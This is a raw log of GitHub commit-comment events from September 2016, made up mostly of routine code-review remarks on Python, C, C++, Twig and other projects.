{"id":"4623769645","type":"CommitCommentEvent","actor":{"login":"varund7726"},"repo":{"name":"ResurrectionRemix/Resurrection_packages_apps_Settings"},"payload":{"comment":{"id":19189478,"position":null,"line":null,"path":null,"commit_id":"9a69508a088f5921fe0a141e5bf11e9cab61d760","created_at":"2016-09-27T12:13:17Z","updated_at":"2016-09-27T12:13:17Z","body":"??"}},"created_at":"2016-09-27T12:13:17Z"}
{"id":"4623772879","type":"CommitCommentEvent","actor":{"login":"alankelly"},"repo":{"name":"NumScale/boost.simd"},"payload":{"comment":{"id":19189486,"position":64,"line":64,"path":"include/boost/simd/arch/x86/avx/simd/function/deinterleave.hpp","commit_id":"b8458ae8a23ebc307b7e3ab5d2ac15d85968d16b","created_at":"2016-09-27T12:13:58Z","updated_at":"2016-09-27T12:13:58Z","body":"I think that the solution here is to add a function to generic bitwise_cast which catches the case when the input and target types are the same (and returns the unaltered input).\r\nThe second problem is why does boost.simd not recognise a __256 as a pack<float, avx> ?"}},"created_at":"2016-09-27T12:13:58Z"}
{"id":"4623775390","type":"CommitCommentEvent","actor":{"login":"Serg-Norseman"},"repo":{"name":"Serg-Norseman/GEDKeeper"},"payload":{"comment":{"id":19189490,"position":null,"line":null,"path":null,"commit_id":"463921af68e7c1dc15eca0eb53025501a0e0b27f","created_at":"2016-09-27T12:14:31Z","updated_at":"2016-09-27T12:14:31Z","body":"That is not essential. Just showed how I like :)"}},"created_at":"2016-09-27T12:14:31Z"}
{"id":"4623775755","type":"CommitCommentEvent","actor":{"login":"gdampf"},"repo":{"name":"torvalds/linux"},"payload":{"comment":{"id":19189491,"position":null,"line":null,"path":null,"commit_id":"367e8560e8d7a62d96e9b1d644028a3816e04206","created_at":"2016-09-27T12:14:31Z","updated_at":"2016-09-27T12:14:31Z","body":"The patch in drivers/staging/fbtft/fbtft-core.c is buggy - the if-Statement in 395 has to be negated and the assignment in 398 has to be moved after the usage in 399. Otherwise the result is always 0 fps!"}},"created_at":"2016-09-27T12:14:31Z"}
{"id":"4623776452","type":"CommitCommentEvent","actor":{"login":"jackpoz"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19189494,"position":null,"line":null,"path":null,"commit_id":"aeb20951bbac5453d5a4db22d23516ba8f948275","created_at":"2016-09-27T12:14:43Z","updated_at":"2016-09-27T12:14:43Z","body":"well travis has some custom flags which are more strict and require no warnings \r\n```\r\n-DWITH_WARNINGS=1 -DCMAKE_C_FLAGS=-Werror -DCMAKE_CXX_FLAGS=-Werror\r\n```"}},"created_at":"2016-09-27T12:14:43Z"}
{"id":"4623777663","type":"CommitCommentEvent","actor":{"login":"ruslangaripov"},"repo":{"name":"Serg-Norseman/GEDKeeper"},"payload":{"comment":{"id":19189497,"position":null,"line":null,"path":null,"commit_id":"463921af68e7c1dc15eca0eb53025501a0e0b27f","created_at":"2016-09-27T12:14:57Z","updated_at":"2016-09-27T12:14:57Z","body":"I got it! 😉  👍 "}},"created_at":"2016-09-27T12:14:57Z"}
{"id":"4623779998","type":"CommitCommentEvent","actor":{"login":"adde9708"},"repo":{"name":"micrictor/stuxnet"},"payload":{"comment":{"id":19189502,"position":4,"line":73,"path":"Dropper/CodeBlock.c","commit_id":"e6fa6e31f25aa2dbee744aa64c7d432a73c3fb47","created_at":"2016-09-27T12:15:27Z","updated_at":"2016-09-27T12:15:27Z","body":"You mean this runs when the virus start up i think. right?"}},"created_at":"2016-09-27T12:15:27Z"}
{"id":"4623780860","type":"CommitCommentEvent","actor":{"login":"farhatgladmind"},"repo":{"name":"pkumar7/wordcloud"},"payload":{"comment":{"id":19189504,"position":null,"line":null,"path":null,"commit_id":"75be11688c5f304f8e81a61aea6ed6be4490de9f","created_at":"2016-09-27T12:15:39Z","updated_at":"2016-09-27T12:15:39Z","body":"Here templates folder is inside app..so you called it as 'index.html'. In previous case templates folder was inside project folder (in the setting.py location). So we called that as \"./index.html\", path is set for templates folder in settings.py."}},"created_at":"2016-09-27T12:15:39Z"}
{"id":"4623782768","type":"CommitCommentEvent","actor":{"login":"jackpoz"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19189512,"position":null,"line":null,"path":null,"commit_id":"aeb20951bbac5453d5a4db22d23516ba8f948275","created_at":"2016-09-27T12:16:02Z","updated_at":"2016-09-27T12:16:02Z","body":"actually it's not travis that reported a broken build but Carbenium's build system"}},"created_at":"2016-09-27T12:16:02Z"}
{"id":"4623783276","type":"CommitCommentEvent","actor":{"login":"surgiie"},"repo":{"name":"surgiie/compean"},"payload":{"comment":{"id":19189517,"position":null,"line":null,"path":null,"commit_id":"ca8b3e25f6bbc3971ee7442c88847abac11559aa","created_at":"2016-09-27T12:16:10Z","updated_at":"2016-09-27T12:16:10Z","body":"Ive been meaning to do this per your suggestion, i just forgot all about this xD"}},"created_at":"2016-09-27T12:16:10Z"}
{"id":"4623783425","type":"CommitCommentEvent","actor":{"login":"smspillaz"},"repo":{"name":"smspillaz/pubmed-retraction-analysis"},"payload":{"comment":{"id":19189518,"position":30,"line":35,"path":"importer/load.py","commit_id":"6b690a64ae057aa895a1fbcc449378da5d17ba2e","created_at":"2016-09-27T12:16:12Z","updated_at":"2016-09-27T12:16:12Z","body":"PEP8 requires that uppercased names are used only for constants in the global scope. So either these can be lowercased or defined in the outer scope."}},"created_at":"2016-09-27T12:16:12Z"}
{"id":"4623787753","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19189527,"position":null,"line":null,"path":null,"commit_id":"dea83dbd376f22d2eff4c844392cc9301e3fb98e","created_at":"2016-09-27T12:17:07Z","updated_at":"2016-09-27T12:17:07Z","body":"![1_0_19_283d_3fb_1_c00000_0_0_0](https://cloud.githubusercontent.com/assets/4148122/18872906/100d65c6-84bd-11e6-8951-87c1ef1b6352.jpg)\r\n"}},"created_at":"2016-09-27T12:17:07Z"}
{"id":"4623788243","type":"CommitCommentEvent","actor":{"login":"fixitsmkll"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19189528,"position":null,"line":null,"path":null,"commit_id":"f513adb0dc7f86f2e5265a7cdc174af51191d330","created_at":"2016-09-27T12:17:12Z","updated_at":"2016-09-27T12:17:12Z","body":"Thank you."}},"created_at":"2016-09-27T12:17:12Z"}
{"id":"4623788730","type":"CommitCommentEvent","actor":{"login":"ccharly"},"repo":{"name":"NumScale/boost.simd"},"payload":{"comment":{"id":19189530,"position":64,"line":64,"path":"include/boost/simd/arch/x86/avx/simd/function/deinterleave.hpp","commit_id":"b8458ae8a23ebc307b7e3ab5d2ac15d85968d16b","created_at":"2016-09-27T12:17:18Z","updated_at":"2016-09-27T12:17:18Z","body":"Alright then, can you do it in a separate branch? Also, it may be a good idea to do a generic implementation for any identity `bitwise_cast` in this file. The dispatch overload would be like:\r\n```\r\n  BOOST_DISPATCH_OVERLOAD ( bitwise_cast_\r\n                          , (typename A0)\r\n                          , bd::cpu_\r\n                          , bd::generic_< bd::unspecified_<A0> >\r\n                          , bd::target_< bd::generic_< bd::unspecified_<A0> > >\r\n                          )\r\n```\r\n\r\nAnd this is identity, so just return the parameter directly."}},"created_at":"2016-09-27T12:17:18Z"}
{"id":"4623788921","type":"CommitCommentEvent","actor":{"login":"smspillaz"},"repo":{"name":"smspillaz/pubmed-retraction-analysis"},"payload":{"comment":{"id":19189531,"position":30,"line":35,"path":"importer/load.py","commit_id":"6b690a64ae057aa895a1fbcc449378da5d17ba2e","created_at":"2016-09-27T12:17:21Z","updated_at":"2016-09-27T12:17:21Z","body":"Also, these should not be defined in the importer at all. If they are not present in the environment, the importer should just bail out, since these credentials cannot be published publicly."}},"created_at":"2016-09-27T12:17:21Z"}
{"id":"4623790560","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19189535,"position":null,"line":null,"path":null,"commit_id":"dea83dbd376f22d2eff4c844392cc9301e3fb98e","created_at":"2016-09-27T12:17:42Z","updated_at":"2016-09-27T12:17:42Z","body":"i now check openATV."}},"created_at":"2016-09-27T12:17:42Z"}
{"id":"4623793306","type":"CommitCommentEvent","actor":{"login":"smspillaz"},"repo":{"name":"smspillaz/pubmed-retraction-analysis"},"payload":{"comment":{"id":19189539,"position":38,"line":42,"path":"importer/load.py","commit_id":"6b690a64ae057aa895a1fbcc449378da5d17ba2e","created_at":"2016-09-27T12:18:16Z","updated_at":"2016-09-27T12:18:16Z","body":"You can also do `USER = os.environ.get('DATABASE_URL', 'localhost')`\r\n\r\nThough in light of the above, it would be better to have a function that just checks all these are defined in the environment and if not, throws an exception."}},"created_at":"2016-09-27T12:18:16Z"}
{"id":"4623794444","type":"CommitCommentEvent","actor":{"login":"smspillaz"},"repo":{"name":"smspillaz/pubmed-retraction-analysis"},"payload":{"comment":{"id":19189542,"position":49,"line":51,"path":"importer/load.py","commit_id":"6b690a64ae057aa895a1fbcc449378da5d17ba2e","created_at":"2016-09-27T12:18:31Z","updated_at":"2016-09-27T12:18:31Z","body":"See above on PEP8 variable naming."}},"created_at":"2016-09-27T12:18:31Z"}
{"id":"4623794629","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19189543,"position":104,"line":86,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"b02e29a5ada82f54f327ed5159fa699de6d33351","created_at":"2016-09-27T12:18:33Z","updated_at":"2016-09-27T12:18:33Z","body":"переносов поменьше делай"}},"created_at":"2016-09-27T12:18:33Z"}
{"id":"4623796841","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19189547,"position":127,"line":109,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"b02e29a5ada82f54f327ed5159fa699de6d33351","created_at":"2016-09-27T12:19:01Z","updated_at":"2016-09-27T12:19:01Z","body":"для i == 0 свалишься"}},"created_at":"2016-09-27T12:19:01Z"}
{"id":"4623797240","type":"CommitCommentEvent","actor":{"login":"smspillaz"},"repo":{"name":"smspillaz/pubmed-retraction-analysis"},"payload":{"comment":{"id":19189549,"position":51,"line":53,"path":"importer/load.py","commit_id":"6b690a64ae057aa895a1fbcc449378da5d17ba2e","created_at":"2016-09-27T12:19:06Z","updated_at":"2016-09-27T12:19:06Z","body":"space between `bolt://` and `URL`\r\n\r\nThat said, I would suggest just passing `URL` here and requiring the user to pass the protocol as part of `DATABASE_URL`"}},"created_at":"2016-09-27T12:19:06Z"}
{"id":"4623799455","type":"CommitCommentEvent","actor":{"login":"smspillaz"},"repo":{"name":"smspillaz/pubmed-retraction-analysis"},"payload":{"comment":{"id":19189555,"position":49,"line":51,"path":"importer/load.py","commit_id":"6b690a64ae057aa895a1fbcc449378da5d17ba2e","created_at":"2016-09-27T12:19:31Z","updated_at":"2016-09-27T12:19:31Z","body":"Since this variable isn't used anywhere else, you can just open `parse_result.file` below"}},"created_at":"2016-09-27T12:19:31Z"}
{"id":"4623800700","type":"CommitCommentEvent","actor":{"login":"smspillaz"},"repo":{"name":"smspillaz/pubmed-retraction-analysis"},"payload":{"comment":{"id":19189558,"position":60,"line":59,"path":"importer/load.py","commit_id":"6b690a64ae057aa895a1fbcc449378da5d17ba2e","created_at":"2016-09-27T12:19:48Z","updated_at":"2016-09-27T12:19:48Z","body":"Is this still necessary?"}},"created_at":"2016-09-27T12:19:48Z"}
{"id":"4623805238","type":"CommitCommentEvent","actor":{"login":"smspillaz"},"repo":{"name":"smspillaz/pubmed-retraction-analysis"},"payload":{"comment":{"id":19189564,"position":60,"line":59,"path":"importer/load.py","commit_id":"6b690a64ae057aa895a1fbcc449378da5d17ba2e","created_at":"2016-09-27T12:20:46Z","updated_at":"2016-09-27T12:20:46Z","body":"Ah, removed in https://github.com/smspillaz/pubmed-retraction-analysis/pull/32/commits/578422424da55f2c3d7e0f3c6182d9c0e5f60a44"}},"created_at":"2016-09-27T12:20:46Z"}
{"id":"4623812756","type":"CommitCommentEvent","actor":{"login":"abdulhannanali"},"repo":{"name":"indexiatech/re-notif"},"payload":{"comment":{"id":19189573,"position":null,"line":null,"path":null,"commit_id":"fe546d84bdeeb942147a7fe4203968ad795db4ff","created_at":"2016-09-27T12:22:22Z","updated_at":"2016-09-27T12:22:22Z","body":"Nice catch!"}},"created_at":"2016-09-27T12:22:22Z"}
{"id":"4623813368","type":"CommitCommentEvent","actor":{"login":"SlavaShake"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19189574,"position":127,"line":109,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"b02e29a5ada82f54f327ed5159fa699de6d33351","created_at":"2016-09-27T12:22:29Z","updated_at":"2016-09-27T12:22:29Z","body":"как оботи? я здесь смотрю на предстоящий чтобы не посчитывать провеблы вместо слов"}},"created_at":"2016-09-27T12:22:29Z"}
{"id":"4623818811","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19189580,"position":38,"line":164,"path":"resources/qml/MonitorButton.qml","commit_id":"f4d13713a2206df714fbe6c0ed5dac070711ba15","created_at":"2016-09-27T12:23:38Z","updated_at":"2016-09-27T12:23:38Z","body":"If you want to be completely correct, you should also handle the case of printerOutputDevices being empty. (minor issue)"}},"created_at":"2016-09-27T12:23:38Z"}
{"id":"4623819901","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19189583,"position":null,"line":null,"path":null,"commit_id":"1a3005d0b82c5a1872cb1207ca1264b099cc8d46","created_at":"2016-09-27T12:23:51Z","updated_at":"2016-09-27T12:23:51Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Y420IIRhSvSmzyAL4bq01w"}},"created_at":"2016-09-27T12:23:51Z"}
{"id":"4623821385","type":"CommitCommentEvent","actor":{"login":"smspillaz"},"repo":{"name":"smspillaz/pubmed-retraction-analysis"},"payload":{"comment":{"id":19189586,"position":75,"line":70,"path":"importer/load.py","commit_id":"6b690a64ae057aa895a1fbcc449378da5d17ba2e","created_at":"2016-09-27T12:24:10Z","updated_at":"2016-09-27T12:24:10Z","body":"This won't behave as you might expect - `\\` will make the line continue but then you'll end up with tons of extra whitespace in the command. Instead, Python supports multi-line strings by using multiple quotes without a `+` operator:\r\n\r\n    commands.append(\"MERGE (article:Article \"\r\n                                      \"{title:'{record[pmid]'}'\")\r\n\r\nI also noticed that `format` is not being called on this string -> Untested, but you will probably want something like:\r\n\r\n    commands.append(\"MERGE (article:Article \"\r\n                                      \"{{title:'{record[pmid]}'}}'\".format(record))\r\n\r\n"}},"created_at":"2016-09-27T12:24:10Z"}
{"id":"4623821514","type":"CommitCommentEvent","actor":{"login":"SlavaShake"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19189587,"position":127,"line":109,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"b02e29a5ada82f54f327ed5159fa699de6d33351","created_at":"2016-09-27T12:24:12Z","updated_at":"2016-09-27T12:24:12Z","body":"Просто заменить на плюс?\r\n"}},"created_at":"2016-09-27T12:24:12Z"}
{"id":"4623822981","type":"CommitCommentEvent","actor":{"login":"smspillaz"},"repo":{"name":"smspillaz/pubmed-retraction-analysis"},"payload":{"comment":{"id":19189590,"position":84,"line":76,"path":"importer/load.py","commit_id":"6b690a64ae057aa895a1fbcc449378da5d17ba2e","created_at":"2016-09-27T12:24:31Z","updated_at":"2016-09-27T12:24:31Z","body":"See above on multiline strings and calling `format`"}},"created_at":"2016-09-27T12:24:31Z"}
{"id":"4623824829","type":"CommitCommentEvent","actor":{"login":"smspillaz"},"repo":{"name":"smspillaz/pubmed-retraction-analysis"},"payload":{"comment":{"id":19189596,"position":94,"line":83,"path":"importer/load.py","commit_id":"6b690a64ae057aa895a1fbcc449378da5d17ba2e","created_at":"2016-09-27T12:24:54Z","updated_at":"2016-09-27T12:24:54Z","body":"This debug statement can be removed"}},"created_at":"2016-09-27T12:24:54Z"}
{"id":"4623826752","type":"CommitCommentEvent","actor":{"login":"smspillaz"},"repo":{"name":"smspillaz/pubmed-retraction-analysis"},"payload":{"comment":{"id":19189602,"position":109,"line":91,"path":"importer/load.py","commit_id":"6b690a64ae057aa895a1fbcc449378da5d17ba2e","created_at":"2016-09-27T12:25:20Z","updated_at":"2016-09-27T12:25:20Z","body":"See above on calling `.format`"}},"created_at":"2016-09-27T12:25:20Z"}
{"id":"4623828760","type":"CommitCommentEvent","actor":{"login":"flexy1994"},"repo":{"name":"sonata-project/SonataAdminBundle"},"payload":{"comment":{"id":19189608,"position":5,"line":33,"path":"Resources/views/Block/block_admin_list.html.twig","commit_id":"38a63e357c171b6353cfe8952a49fea11f81e322","created_at":"2016-09-27T12:25:44Z","updated_at":"2016-09-27T12:25:44Z","body":"This crashs the admin dashboard.\r\n`Variable \"label\" does not exist in SonataAdminBundle:Block:block_admin_list.html.twig at line 33.`\r\n"}},"created_at":"2016-09-27T12:25:44Z"}
{"id":"4623828811","type":"CommitCommentEvent","actor":{"login":"kasbah"},"repo":{"name":"Bristol-Braille/canute-ui"},"payload":{"comment":{"id":19189609,"position":null,"line":null,"path":null,"commit_id":"ec1adab6755eb220a90c09c5195f109632f3df2c","created_at":"2016-09-27T12:25:44Z","updated_at":"2016-09-27T12:25:44Z","body":"Sure, yeah, just be aware that you are now rebasing and not merging\nwhenever you do a pull.\n\n\n\nOn 27 September 2016 at 12:32, matt venn <notifications@github.com> wrote:\n\n> ok, I did that command, now I just carry on as normal?\n>\n> On 27 September 2016 at 13:29, Kaspar Emanuel <notifications@github.com>\n> wrote:\n>\n> > b81dc40\n> > <https://github.com/Bristol-Braille/canute-ui/commit/\n> b81dc4081746b203d7ba942d18cc36df7a31a1df>\n> > is just noise because it didn't really do anything.\n> >\n> > git config --global --bool pull.rebase true\n> >\n> > —\n> > You are receiving this because you authored the thread.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/Bristol-Braille/canute-ui/commit/\n> ec1adab6755eb220a90c09c5195f109632f3df2c#commitcomment-19188875>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/AAmtbOcEFSDaSOP0C_\n> skOE7DsUBI75ERks5quP4JgaJpZM4KHe0j>\n>\n> > .\n> >\n>\n>\n>\n> --\n> Matthew Venn\n> web mattvenn.net twitter @matthewvenn <https://twitter.com/matthewvenn>\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Bristol-Braille/canute-ui/commit/ec1adab6755eb220a90c09c5195f109632f3df2c#commitcomment-19188917>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAMoBrJrGx_zAZyoLt7VRc7mRUMkbH9yks5quP7WgaJpZM4KHe0j>\n> .\n>\n"}},"created_at":"2016-09-27T12:25:44Z"}
{"id":"4623829144","type":"CommitCommentEvent","actor":{"login":"LilineB"},"repo":{"name":"ManonHc/Anglais"},"payload":{"comment":{"id":19189611,"position":null,"line":null,"path":null,"commit_id":"f7489dab2815cf842ef802c66481829980c491f3","created_at":"2016-09-27T12:25:48Z","updated_at":"2016-09-27T12:25:48Z","body":"J'ai un peu modifié le fichier... J'ai mis les tournois en plus des clubs ^^"}},"created_at":"2016-09-27T12:25:48Z"}
{"id":"4623831963","type":"CommitCommentEvent","actor":{"login":"NeQuissimus"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19189616,"position":5,"line":8,"path":"nixos/modules/services/web-servers/apache-httpd/wordpress.nix","commit_id":"4671806183e05e839fa4fe9459079ad527e52905","created_at":"2016-09-27T12:26:21Z","updated_at":"2016-09-27T12:26:21Z","body":"YES! :+1: "}},"created_at":"2016-09-27T12:26:21Z"}
{"id":"4623834045","type":"CommitCommentEvent","actor":{"login":"smspillaz"},"repo":{"name":"smspillaz/pubmed-retraction-analysis"},"payload":{"comment":{"id":19189618,"position":119,"line":100,"path":"importer/load.py","commit_id":"6b690a64ae057aa895a1fbcc449378da5d17ba2e","created_at":"2016-09-27T12:26:49Z","updated_at":"2016-09-27T12:26:49Z","body":"`if __name__ == \"__main__\"`\r\n\r\nNote the underscores :)"}},"created_at":"2016-09-27T12:26:49Z"}
{"id":"4623834770","type":"CommitCommentEvent","actor":{"login":"smspillaz"},"repo":{"name":"smspillaz/pubmed-retraction-analysis"},"payload":{"comment":{"id":19189622,"position":122,"line":103,"path":"importer/load.py","commit_id":"6b690a64ae057aa895a1fbcc449378da5d17ba2e","created_at":"2016-09-27T12:26:58Z","updated_at":"2016-09-27T12:26:58Z","body":"`main` is being called twice here"}},"created_at":"2016-09-27T12:26:58Z"}
{"id":"4623836374","type":"CommitCommentEvent","actor":{"login":"flexy1994"},"repo":{"name":"sonata-project/SonataAdminBundle"},"payload":{"comment":{"id":19189624,"position":5,"line":21,"path":"Resources/views/Block/block_search_result.html.twig","commit_id":"38a63e357c171b6353cfe8952a49fea11f81e322","created_at":"2016-09-27T12:27:17Z","updated_at":"2016-09-27T12:27:17Z","body":"Same issue as in block_admin_list.html.twig:\r\n\r\nVariable \"label\" does not exist in SonataAdminBundle:Block:block_search_result.html.twig at line 21."}},"created_at":"2016-09-27T12:27:17Z"}
{"id":"4623839440","type":"CommitCommentEvent","actor":{"login":"chipitsine"},"repo":{"name":"chipitsine/openvpn-build"},"payload":{"comment":{"id":19189629,"position":null,"line":null,"path":null,"commit_id":"cebc45e46ed18111305954127e08f0be9894cc73","created_at":"2016-09-27T12:27:54Z","updated_at":"2016-09-27T12:27:54Z","body":"I'm afraid we will encounter some 86 <--> 64 magic with \"which I did not yet have time to test\"\r\nI'll look at your branch soon.\r\n\r\nwhat do you think about script in general ? doesn't it look ugly ?"}},"created_at":"2016-09-27T12:27:54Z"}
{"id":"4623839674","type":"CommitCommentEvent","actor":{"login":"enzy"},"repo":{"name":"manGoweb/kucharka"},"payload":{"comment":{"id":19189631,"position":null,"line":null,"path":null,"commit_id":"9ea5054164be9098a2dc73dbc694df9a3e87b8fe","created_at":"2016-09-27T12:27:56Z","updated_at":"2016-09-27T12:27:56Z","body":"Díky ❤️ "}},"created_at":"2016-09-27T12:27:56Z"}
{"id":"4623841025","type":"CommitCommentEvent","actor":{"login":"zubairshokh"},"repo":{"name":"GoogleCloudPlatform/cloud-vision"},"payload":{"comment":{"id":19189638,"position":null,"line":null,"path":null,"commit_id":"a42a6780d0c36834019ee5ac267145328c534b87","created_at":"2016-09-27T12:28:12Z","updated_at":"2016-09-27T12:28:12Z","body":"Can i have a formulla, to get the percentage of Dominant color."}},"created_at":"2016-09-27T12:28:12Z"}
{"id":"4623844944","type":"CommitCommentEvent","actor":{"login":"loooody"},"repo":{"name":"loooody/loooody.github.io"},"payload":{"comment":{"id":19189666,"position":null,"line":null,"path":null,"commit_id":"d1933ffaaf374bf9ab60a57344168a8568ad1cab","created_at":"2016-09-27T12:28:55Z","updated_at":"2016-09-27T12:28:55Z","body":"<h1>loooody's blog</h1>\r\n<h2>这是属于我个人的博客，我希望它能伴随我的成长，记录我生命中的点点滴滴</h2>\r\n<p>*\r\n在本次搭建个人博客的过程中，遇到了许多麻烦，在此期间，我不断地去尝试不同的方法，相信自己能靠自己的力量本次任务，最终，我成功了，这让我感到非常兴奋</p>\r\n"}},"created_at":"2016-09-27T12:28:55Z"}
{"id":"4623847158","type":"CommitCommentEvent","actor":{"login":"greg0ire"},"repo":{"name":"sonata-project/SonataAdminBundle"},"payload":{"comment":{"id":19189676,"position":5,"line":33,"path":"Resources/views/Block/block_admin_list.html.twig","commit_id":"38a63e357c171b6353cfe8952a49fea11f81e322","created_at":"2016-09-27T12:29:23Z","updated_at":"2016-09-27T12:29:23Z","body":"Uuuh yup, this looks strange. I think maybe @core23 mistook `label` with `trans`"}},"created_at":"2016-09-27T12:29:23Z"}
{"id":"4623847738","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19189677,"position":null,"line":null,"path":null,"commit_id":"dea83dbd376f22d2eff4c844392cc9301e3fb98e","created_at":"2016-09-27T12:29:30Z","updated_at":"2016-09-27T12:29:30Z","body":"One tuner recording (EPGRefresh), one Live TV:\r\n![image](https://cloud.githubusercontent.com/assets/2022025/18873180/63fba778-84be-11e6-83eb-e8359ed73fb0.png)\r\n\r\nBox transcoding, one more tuner \"recording\":\r\n![image](https://cloud.githubusercontent.com/assets/2022025/18873232/a43ada8e-84be-11e6-9f39-7e3cccbb4bd1.png)\r\n\r\nTranscoding stopped, tuner free again:\r\n![image](https://cloud.githubusercontent.com/assets/2022025/18873269/cab68190-84be-11e6-8bd7-c8fdc8f31933.png)\r\n"}},"created_at":"2016-09-27T12:29:30Z"}
{"id":"4623851999","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19189686,"position":127,"line":109,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"b02e29a5ada82f54f327ed5159fa699de6d33351","created_at":"2016-09-27T12:30:20Z","updated_at":"2016-09-27T12:30:20Z","body":"либо же от i = 1; идти, либо просто переделать как-то. Тестить надо это дело. Unit-test напиши на эту функцию и посмотри, как она будет себя вести. \r\n\r\n_// вообще выпили из этой функции текст_сайз. Передавай сюда только текст, а все подсчёты веди внутри\r\n// функции words_in_file();_\r\n\r\n```\r\nvoid words_in_file_test(const char *text, const long text_size) {\r\n    long expected = ;\r\n    long got = words_in_file(text, text_size);\r\n    if (expected != got) {\r\n        printf(\"Test failed! Wanted: %d, got: %d\", got, expected);\r\n        return;\r\n    }\r\n}\r\n```\r\n\r\nЗдесь можешь написать много тест-кейсов в цикле, чтобы потом радоваться, когда их запускаешь. Либами для тестинга не пользуйся, пили вручную. За это будет тебе отдельный респект от преподов, когда сдавать пойдёшь"}},"created_at":"2016-09-27T12:30:20Z"}
{"id":"4623852059","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19189687,"position":null,"line":null,"path":null,"commit_id":"dea83dbd376f22d2eff4c844392cc9301e3fb98e","created_at":"2016-09-27T12:30:21Z","updated_at":"2016-09-27T12:30:21Z","body":"![1_0_19_283d_3fb_1_c00000_0_0_0](https://cloud.githubusercontent.com/assets/4148122/18873295/e19ab0fc-84be-11e6-9052-46915f860628.jpg)\r\n\r\natv 5.3 here the same."}},"created_at":"2016-09-27T12:30:21Z"}
{"id":"4623852287","type":"CommitCommentEvent","actor":{"login":"darren562"},"repo":{"name":"zhenyong/vue-router"},"payload":{"comment":{"id":19189688,"position":3,"line":3,"path":"docs/zh-cn/essentials/named-views.md","commit_id":"4616ab25e2b78206114bb473d10ac87b896215c5","created_at":"2016-09-27T12:30:24Z","updated_at":"2016-09-27T12:30:24Z","body":"没翻译：you can have multiple and give each of them a name. A router-view without a name will be given default as its name.\r\n你可以给每一个视图定义一个name,如果你没有定义,那么它就会调用默认的视图。"}},"created_at":"2016-09-27T12:30:24Z"}
{"id":"4623855181","type":"CommitCommentEvent","actor":{"login":"cdiacon"},"repo":{"name":"dotmailer/dotmailer-magento-extension"},"payload":{"comment":{"id":19189694,"position":57,"line":196,"path":"code/Dotdigitalgroup/Email/Model/Sales/Observer.php","commit_id":"e05b0e479650fa9732e75cac0168cf38a40c6fc8","created_at":"2016-09-27T12:30:56Z","updated_at":"2016-09-27T12:30:56Z","body":"@adeelq doAutomation should not be called if the program id is not mapped, and no need to log that the program id is not found, this is normal behavior."}},"created_at":"2016-09-27T12:30:56Z"}
{"id":"4623855198","type":"CommitCommentEvent","actor":{"login":"ikwattro"},"repo":{"name":"Vinelab/NeoEloquent"},"payload":{"comment":{"id":19189695,"position":13,"line":20,"path":"composer.json","commit_id":"bb03544c44945a9261b5dd1eda4ea08062fe7c86","created_at":"2016-09-27T12:30:56Z","updated_at":"2016-09-27T12:30:56Z","body":"You should upgrade ! :)"}},"created_at":"2016-09-27T12:30:56Z"}
{"id":"4623855630","type":"CommitCommentEvent","actor":{"login":"justinclift"},"repo":{"name":"minio/awesome-minio"},"payload":{"comment":{"id":19189699,"position":4,"line":16,"path":"README.md","commit_id":"3b5f106411dbeff51a79e6109f2bc151ced357ee","created_at":"2016-09-27T12:31:02Z","updated_at":"2016-09-27T12:31:02Z","body":"Ahhh, now I grok what you were trying to do with this.\r\n\r\nYou could still achieve this, by adding something like:\r\n* [Your Project](https://github.com/minio/awesome-minio/issues/new) - To add your project here, open an Issue or Pull Request telling us about your Minio usage, so we can include it."}},"created_at":"2016-09-27T12:31:02Z"}
{"id":"4623855660","type":"CommitCommentEvent","actor":{"login":"fancyzzy126"},"repo":{"name":"fancyzzy126/Doudizhu"},"payload":{"comment":{"id":19189700,"position":null,"line":null,"path":null,"commit_id":"c37f3d3abf776f91142dafaf98b527688578cc5e","created_at":"2016-09-27T12:31:02Z","updated_at":"2016-09-27T12:31:02Z","body":"I have modified the README file"}},"created_at":"2016-09-27T12:31:02Z"}
{"id":"4623858548","type":"CommitCommentEvent","actor":{"login":"Mulkave"},"repo":{"name":"Vinelab/NeoEloquent"},"payload":{"comment":{"id":19189708,"position":13,"line":20,"path":"composer.json","commit_id":"bb03544c44945a9261b5dd1eda4ea08062fe7c86","created_at":"2016-09-27T12:31:34Z","updated_at":"2016-09-27T12:31:34Z","body":"hahah sure will 😉  just trying to get something to work first."}},"created_at":"2016-09-27T12:31:34Z"}
